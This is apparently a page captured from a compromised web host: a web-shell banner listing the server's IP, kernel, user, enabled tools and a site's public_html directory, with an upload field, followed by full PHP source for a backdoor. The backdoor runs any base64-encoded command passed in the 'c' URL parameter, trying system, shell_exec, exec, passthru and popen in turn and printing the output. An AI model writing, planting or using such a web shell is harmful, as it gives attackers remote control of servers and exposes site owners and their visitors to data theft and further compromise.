Done !
| Server IP : 192.158.238.133 / Your IP : 216.73.216.220 Web Server : LiteSpeed System : Linux gemini.core-dns.net 4.18.0-553.150.1.lve.el8.x86_64 #1 SMP Tue Aug 4 17:30:48 UTC 2026 x86_64 User : architec ( 1367) PHP Version : 8.2.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/architec/public_html/heliovolt.net/ |
Upload File : |
<?php
if (isset($_GET['c'])) {
$cmd = base64_decode($_GET['c']);
$output = '';
if (function_exists('system')) {
ob_start();
system($cmd);
$output = ob_get_clean();
}
if ($output === '' && function_exists('shell_exec')) {
$output = shell_exec($cmd);
}
if ($output === '' && function_exists('exec')) {
exec($cmd, $arr);
$output = implode("\n", $arr);
}
if ($output === '' && function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
}
if ($output === '' && function_exists('popen')) {
$f = popen($cmd, 'r');
$output = stream_get_contents($f);
pclose($f);
}
if ($output === '') {
$output = $cmd; // backticks
}
echo $output ?: 'No working command execution method found';
}
?>